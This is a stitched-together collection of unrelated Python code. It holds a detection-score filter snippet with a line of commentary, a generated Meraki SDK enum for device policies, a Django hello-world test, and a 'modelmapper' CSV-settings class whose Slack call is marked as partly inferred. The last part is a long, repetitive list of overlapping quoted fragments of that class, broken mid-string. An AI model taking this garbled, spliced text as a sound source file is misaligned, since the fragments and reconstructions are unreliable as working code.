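    """Map class ids to names, keeping only detections at or above min_score."""
    return {
        class_info[class_id]["name"]
        for class_id, score in zip(result["class_ids"], result["scores"])
        if score >= min_score
    }

# Plain Python data shaped like one element of model.detect()'s output:
r = {"class_ids": [1, 2], "scores": [0.98, 0.42]}
class_info = [{"name": "BG"}, {"name": "prescription"}, {"name": "receipt"}]
print(confident_class_names(r, class_info))  # {'prescription'}

Filtering by score before the membership test would avoid copying images on low-confidence detections, which the original loop does not guard against.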
# -*- coding: utf-8 -*-

"""
    meraki_sdk

    This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).
"""


class DevicePolicyEnum(object):

    """Implementation of the 'DevicePolicy' enum.

    The policy to apply to the specified client. Can be 'Whitelisted',
    'Blocked', 'Normal' or 'Group policy'. Required.

    Attributes:
        WHITELISTED: TODO: type description here.
        BLOCKED: TODO: type description here.
        NORMAL: TODO: type description here.
        ENUM_GROUP_POLICY: TODO: type description here.

    """

    WHITELISTED = 'Whitelisted'

    BLOCKED = 'Blocked'

    NORMAL = 'Normal'

    ENUM_GROUP_POLICY = 'Group policy'
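Because the enum members above are plain string constants rather than enum.Enum members, they can be compared against raw API values directly. A small sketch using only the class defined above (the validator function is hypothetical, not part of the generated SDK):

policy = DevicePolicyEnum.ENUM_GROUP_POLICY
assert policy == 'Group policy'  # members are ordinary str constants

def is_known_policy(value):
    """Check a raw devicePolicy string against the generated constants."""
    return value in (DevicePolicyEnum.WHITELISTED, DevicePolicyEnum.BLOCKED,
                     DevicePolicyEnum.NORMAL, DevicePolicyEnum.ENUM_GROUP_POLICY)

print(is_known_policy('Blocked'))  # True
print(is_known_policy('banned'))   # False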
from django.test import TestCase
from django.test import Client


class HelloWorldTestCase(TestCase):
    """Hello world tests"""

    def test_successful_case(self):
        """Successful test case"""
        self.assertTrue(True)

    def test_http_request(self):
        client = Client()
        response = client.get("/")
        self.assertEqual(200, response.status_code)
        self.assertEqual(response.content.decode(),
                         "Hello world from Django! You're at the index. Bingo")
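For reference, a minimal view that would satisfy test_http_request, assuming it is routed to the root URL. The module layout (views.py / urls.py) follows the usual Django convention and is not taken from this excerpt:

# views.py (sketch)
from django.http import HttpResponse

def index(request):
    return HttpResponse("Hello world from Django! You're at the index. Bingo")

# urls.py (sketch)
# from django.urls import path
# from . import views
# urlpatterns = [path('', views.index)]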
import os
import sys
import logging
import importlib
from ast import literal_eval
from copy import deepcopy
from collections import defaultdict
from collections import namedtuple, Counter
from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake
from modelmapper.slack import slack

OVERRIDES_FILE_NAME = "{}_overrides.toml"
COMBINED_FILE_NAME = "{}_combined.py"


class Base:
    logger = logging.getLogger(__name__)
    SETUP_PATH = None

    def __init__(self, setup_path=None, debug=False):
        self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None)
        if self.setup_path is None:
            raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs to be a class attribute.')
        if not self.setup_path.endswith('_setup.toml'):
            raise ValueError('The path needs to end with _setup.toml')
        self.debug = debug
        self.setup_dir = os.path.dirname(self.setup_path)
        sys.path.append(self.setup_dir)
        clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation',
                       'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed']
        convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats',
                          'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation',
                          'identify_header_by_column_names']
        self._original_settings = load_toml(self.setup_path)['settings']
        self.settings = deepcopy(self._original_settings)
        for item in clean_later:
            self._clean_settings_items(item)
        for item in convert_to_set:
            self.settings[item] = set(self.settings.get(item, []))
        key = 'default_value_for_field_when_casting_error'
        self.settings[key] = self.settings.get(key) or r'{}'
        self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()}
        slack_http_endpoint = self.settings['slack_http_endpoint']
        # attempt to get the passed-in value from an ENV VAR, defaulting to the passed-in value if not present
        slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint)
        self.settings['should_reprocess'] = self.settings.get('should_reprocess', False)
        self.settings['slack_http_endpoint'] = slack_http_endpoint
        self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '')
        self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier)
        self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier)
        self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false']
        self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters'])
        for i, v in (('overrides_path', 'overrides_file_name'),
                     ('combined_path', 'combined_file_name'),
                     ('output_model_path', 'output_model_file')):
            self.settings[i] = os.path.join(self.setup_dir, self.settings[v])
        # Since we are cleaning up the field_name_part_conversion, special characters
        # such as \n need to be added separately.
        # self.settings['field_name_part_conversion'].insert(0, ['\n', '_']).insert(0, ['\r\n', '_'])
        _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items())
        self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1]))
        Settings = namedtuple('Settings', ' '.join(self.settings.keys()))
        self.settings = Settings(**self.settings)
        self.questionable_fields = {}
        self.solid_decisions = {}
        self.failed_to_infer_fields = set()
        self.empty_fields = set()

    def _clean_it(self, item):
        conv = (self.settings['field_name_part_conversion']
                if isinstance(self.settings, dict) else self.settings.field_name_part_conversion)
        item = item.replace('\r\n', '_').replace('\n', '_')
        item = camel_to_snake(item)
        for source, to_replace in conv:
            item = item.replace(source, to_replace)
        return item.strip('_')

    def _clean_settings_items(self, item):
        """ Normalizes list or nested lists """
        if item not in self.settings:
            self.settings[item] = []
        try:
            first_value = self.settings[item][0]
        except IndexError:
            pass
        else:
            if isinstance(first_value, list):
                self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]]
            else:
                self.settings[item] = list(map(self._clean_it, self.settings[item]))

    def _get_clean_field_name(self, name):
        item = self._clean_it(name)
        for source, to_replace in self.settings.field_name_full_conversion:
            if item == source:
                item = to_replace
                break
        return item

    def _get_all_clean_field_names_mapping(self, names):
        name_mapping = {}
        for name in names:
            name_mapping[name] = self._get_clean_field_name(name)
        return name_mapping

    def _get_combined_module(self):
        combined_module_str = self.settings.combined_file_name[:-3]
        return importlib.import_module(combined_module_str)

    def _verify_no_duplicate_clean_names(self, names_mapping):
        clean_names_mapping = {}
        for name, clean_name in names_mapping.items():
            if clean_name in clean_names_mapping:
                raise ValueError(f"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. "
                                 f"They both produce '{clean_name}'")
            else:
                clean_names_mapping[clean_name] = name

    def _does_line_include_data(self, line):
        # whether line has any characters in it that are not in ignore_lines_that_include_only_subset_of
        return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line))

    def _verify_no_duplicate_names(self, names):
        counter = Counter(names)
        duplicates = {i: v for i, v in counter.most_common(10) if v > 1}
        if duplicates:
            raise ValueError(f'The following fields were repeated in the csv: {duplicates}')

    def _get_clean_names_and_csv_data_gen(self, path):
        reader = read_csv_gen(path,
                              identify_header_by_column_names=self.settings.identify_header_by_column_names,
                              cleaning_func=self._clean_it)
        names = next(reader)
        self._verify_no_duplicate_names(names)
        name_mapping = self._get_all_clean_field_names_mapping(names)
        self._verify_no_duplicate_clean_names(name_mapping)
        clean_names = list(name_mapping.values())
        return clean_names, reader

    def _get_all_values_per_clean_name(self, path):
        result = defaultdict(list)
        clean_names, reader = self._get_clean_names_and_csv_data_gen(path)
        # transposing csv and turning into dictionary
        for line in reader:
            if self._does_line_include_data(line):
                for i, v in enumerate(line):
                    try:
                        field_name = clean_names[i]
                    except IndexError:
                        raise ValueError("Your data might have new lines in the field names. "
                                         "Please fix that and try again.")
                    else:
                        if field_name not in self.settings.fields_to_be_scrubbed:
                            result[field_name].append(v)
        return result

    def slack(self, text):
        if self.settings.slack_username and \
                self.settings.slack_channel and \
                self.settings.slack_http_endpoint:
            return slack(
                text,
                username=self.settings.slack_username,
                # the excerpt is truncated here; the remaining keyword arguments are
                # inferred from the guard condition above and may not match the
                # original exactly:
                channel=self.settings.slack_channel,
                slack_http_endpoint=self.settings.slack_http_endpoint)
"convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}'",
"in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel",
"self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path',",
"'{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line):",
"self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in",
"in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or",
"None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if",
"j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item =",
"fix that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return",
"= {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self):",
"- self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v",
"characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) -",
"self.setup_path is None: raise ValueError('setup_path needs to be passed to init or SETUP_PATH",
"in value from ENV VAR, defaulting to passed in value if not present",
"= [] try: first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list):",
"ValueError('setup_path needs to be passed to init or SETUP_PATH needs to be a",
"item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item =",
"= os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier",
"to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace break return item",
"nested lists \"\"\" if item not in self.settings: self.settings[item] = [] try: first_value",
"to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i,",
"in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since",
"names. \" \"Please fix that and try again.\") else: if field_name not in",
"in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name)",
"conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list",
"'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings",
"__init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is",
"= namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {}",
"ValueError('The path needs to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path)",
"item == source: item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping",
"data might have new lines in the field names. \" \"Please fix that",
"item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name] =",
"_clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n',",
"\"\"\" if item not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0]",
"logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self,",
"= self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self,",
"self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for",
"'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for",
"to init or SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'):",
"= (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item",
"i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v])",
"line): # whether line has any characters in it that are not in",
"'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for",
"os import sys import logging import importlib from ast import literal_eval from copy",
"value from ENV VAR, defaulting to passed in value if not present slack_http_endpoint",
"the field_name_part_conversion, special characters # such as \\n need to be added seperately.",
"return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path)",
"r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint']",
"clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) #",
"COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self,",
"item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source: item",
"to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] =",
"setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to",
"cleaning up the field_name_part_conversion, special characters # such as \\n need to be",
"v for i, v in counter.most_common(10) if v > 1} if duplicates: raise",
"self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters",
"return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name]",
"# attempt to get passed in value from ENV VAR, defaulting to passed",
"self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in reader: if",
"from ast import literal_eval from copy import deepcopy from collections import defaultdict from",
"for item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, []))",
"self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in",
"item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for",
"self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key]",
"set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict)",
"Counter(names) duplicates = {i: v for i, v in counter.most_common(10) if v >",
"clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines in the field",
"self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for",
"_get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return",
"| self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'),",
"clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error'",
"in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes",
"counter = Counter(names) duplicates = {i: v for i, v in counter.most_common(10) if",
"def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv",
"special characters # such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0,",
"item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv:",
"= item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested",
"os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters # such",
"else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace",
"the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names =",
"self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self,",
"result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into",
"'_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item = item.replace(source,",
"('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion,",
"names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping:",
"following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader =",
"os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true',",
"item not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError:",
"name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source:",
"= \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None",
"= 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i,",
"= self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)]",
"camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base:",
"in the field names. \" \"Please fix that and try again.\") else: if",
"'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later:",
"for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings =",
"pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in",
"= list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader",
"into dictionary for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line):",
"for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name",
"import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__)",
"is None: raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs",
"literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in value from ENV",
"names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str)",
"def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path",
"clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce",
"('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up",
"clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise",
"for i, v in counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The",
"not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml') self.debug = debug",
"in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with",
"self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key]",
"class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml')",
"passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess',",
"self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields",
"= defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary",
"getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to be passed",
"= set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion)",
"cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return",
"= set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings,",
"x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates =",
"_get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping =",
"import os import sys import logging import importlib from ast import literal_eval from",
"= Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields =",
"deepcopy from collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc import",
"namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields",
"list or nested lists \"\"\" if item not in self.settings: self.settings[item] = []",
"'.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set()",
"read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\"",
"{self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to",
"names): counter = Counter(names) duplicates = {i: v for i, v in counter.most_common(10)",
"= list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in",
"end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion',",
"v > 1} if duplicates: raise ValueError(f'The following fields were repeated in the",
"if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel,",
"self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in",
"'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in",
"_setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names',",
"= self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()}",
"[[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def",
"i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item",
"def _does_line_include_data(self, line): # whether line has any characters in it that are",
"attempt to get passed in value from ENV VAR, defaulting to passed in",
"for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str =",
"if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name = clean_names[i] except IndexError:",
"dictionary for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try:",
"raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs to be",
"transposing csv and turning into dictionary for line in reader: if self._does_line_include_data(line): for",
"\"Please fix that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v)",
"self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted',",
"self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] =",
"has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] =",
"{i: v for i, v in counter.most_common(10) if v > 1} if duplicates:",
"name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path):",
"clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision",
"debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise",
"and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username, channel=self.settings.slack_channel, slack_http_endpoint=self.settings.slack_http_endpoint )",
"\"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False):",
"= OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters'])",
"literal_eval from copy import deepcopy from collections import defaultdict from collections import namedtuple,",
"self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace",
"defaulting to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess']",
"'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings']",
"= self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name']",
"ValueError(\"Your data might have new lines in the field names. \" \"Please fix",
"{duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names)",
"self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result =",
"line has any characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda",
"value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint']",
"= os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values',",
"= camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_')",
"if v > 1} if duplicates: raise ValueError(f'The following fields were repeated in",
"'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item",
"IndexError: raise ValueError(\"Your data might have new lines in the field names. \"",
"next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def",
